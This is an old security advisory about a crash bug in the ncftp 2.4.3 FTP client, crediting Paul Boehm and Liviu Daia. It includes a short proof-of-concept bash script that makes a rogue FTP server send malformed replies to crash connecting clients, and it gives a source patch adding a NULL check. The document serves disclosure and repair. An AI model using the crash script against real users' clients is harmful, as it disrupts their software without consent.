COMMAND

    ncftp

SYSTEMS AFFECTED

    Linux with ncftp 2.4.3 (2.x?)

PROBLEM

    Paul Boehm found following.  If  you connect to a ftp server  that
    responds with  something like  the you  see below  ncftp2.4.3 will
    segfault.  Probably  this isn't very  dangerous anyway cause  your
    victim needs to connect willingly, and using ncftp to your server.
    That won't happen very often unless you've been talking with  your
    victim before.

        #!/bin/bash
        # ncftp2.4.3 crash by infected@cia.at
        #   Start this using inetd. (port 21)

        echo "331 hi, barbie.. wanna crash with me?"
        echo "230 sure ken!"
        echo "then hop in"

    Every reply that looks like this works:

        331 a
        230 b
        c[putting here some exploit code won't work]

    This crashes ncftpd because ncftp 2.x was trying to copy from a
    NULL pointer.  So, no buffer exploit.

SOLUTION

    Version 3  (still beta  at time  of writing  this) handles it just
    fine.  The official gospel is  to upgrade to version 3, since  the
    bug doesn't  occur naturally  in the  wild.   However, some people
    might still want to stick  with version 2.4.3, since a  few useful
    features have been removed along the way to version 3. So here's a
    simple fix, for the sake of the old days by Liviu Daia:

    --- Cmds.c.old  Fri Mar 20 04:02:07 1998
    +++ Cmds.c      Tue Jun 23 19:15:53 1998
    @@ -241,7 +241,7 @@
             * if we can parse out the new directory without
             * doing a PWD command.
             */
    -       if (cwdrp != NULL) {
    +       if (cwdrp != NULL && cwdrp->msg.first != NULL) {
                    /* "xxxx" is new cwd.
                     * Strip out just the xxxx to copy into the remote cwd.
                     */